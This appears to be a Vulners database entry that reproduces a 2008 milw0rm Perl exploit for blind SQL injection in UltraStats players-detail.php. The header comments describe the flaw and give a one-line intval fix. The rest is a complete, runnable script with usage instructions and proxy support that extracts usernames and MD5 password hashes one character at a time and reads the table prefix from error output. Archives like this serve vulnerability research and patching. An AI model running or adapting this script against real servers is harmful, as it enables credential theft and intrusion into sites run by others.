Vulners
Lucene search
Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org
# [!] Detected...: 29.06.2008
# [!] Reported...: 04.07.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles.
# It is able to parse and consolidate the information it can gather from these logs,
# and put them into a MySQL Database with a very efficient and high optimiced database
# layout.
#
# [!] Bug........: $_GET['id'] in players-detail.php near line 52
#
# 36: if ( isset($_GET['id']) )
# 37: {
# 38: // get and check
# 39: $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
#
# 52: $sqlquery = "SELECT " .
# 53: "sum( " .STATS_ALIASES . ".Count) as Count, " .
# 54: STATS_ALIASES . ".Alias as Aliases_Alias, " .
# 55: STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" .
# 56: " FROM " . STATS_ALIASES .
# 57: " WHERE PLAYERID = " . $content['playerguid'] . " " .
# 58: GetCustomServerWhereQuery(STATS_ALIASES, false) .
# 59: " GROUP BY " . STATS_ALIASES . ".Alias " .
# 60: " ORDER BY Count DESC";
#
# [!] Tested on..: v0.2.136, v0.2.142
#
# [!] Solution...: no update from vendor till now
#
# [!] Quick fix..: in players-detail.php line 39:
#
# - replace:
# $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
#
# - with:
# $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id']));
#
if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n --------------------------oOO---(_)---OOo--------------------------";
print "\n | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |";
print "\n | coded by DNX |";
print "\n ------------------------------------------------------------------";
print "\n[!] Usage: perl ultrastats.pl [Host] [Path] <Options>";
print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users";
print "\n[!] Options:";
print "\n -o [no] 1 = username (default)";
print "\n 2 = password";
print "\n 3 = find database prefix (error based)";
print "\n -i [no] Valid GUID, default is 1";
print "\n -l [no] Limitation in sql query, -l 0 shows the first row,";
print "\n -l 1 the second one and so on, default is 0";
print "\n -t [name] Changed the user table name, default is stats_users";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "username";
my $user = 1;
my $limit = 0;
my $table = "stats_users";
my %options = ();
GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s");
print "[!] Exploiting...\n";
if($options{"i"})
{
$user = $options{"i"};
}
if($options{"l"})
{
$limit = $options{"l"};
}
if($options{"t"})
{
$table = $options{"t"};
}
if($options{"o"} == 1)
{
$target = "username";
get_username();
}
elsif($options{"o"} == 2)
{
$target = "password";
get_password();
}
elsif($options{"o"} == 3)
{
get_prefix();
}
sub get_username()
{
syswrite(STDOUT, "[!] Username: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48;
while(!$found && $h <= 57)
{
if(istrue2($host, $path, $table, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$found)
{
$h = 64;
while(!$found && $h <= 122)
{
if(istrue2($host, $path, $table, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
}
sub get_password()
{
syswrite(STDOUT, "[!] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48;
while(!$found && $h <= 57)
{
if(istrue2($host, $path, $table, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$found)
{
$h = 97;
while(!$found && $h <= 102)
{
if(istrue2($host, $path, $table, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
}
sub get_prefix()
{
my $ua = LWP::UserAgent->new;
my $url = "http://".$host.$path."players-detail.php?id=".$user."'";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $response = $ua->get($url);
my $content = $response->content;
$content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/;
print "[!] Prefix: ".$1;
}
print "\n[!] Exploit done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $table = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $response = $ua->get($url);
my $content = $response->content;
my $regexp = "Top Hitlocations where you got killed by others";
my $regexp2 = "Meist genutzte Aliases";
if($content =~ /$regexp/ || $content =~ /$regexp2/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-07-13]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1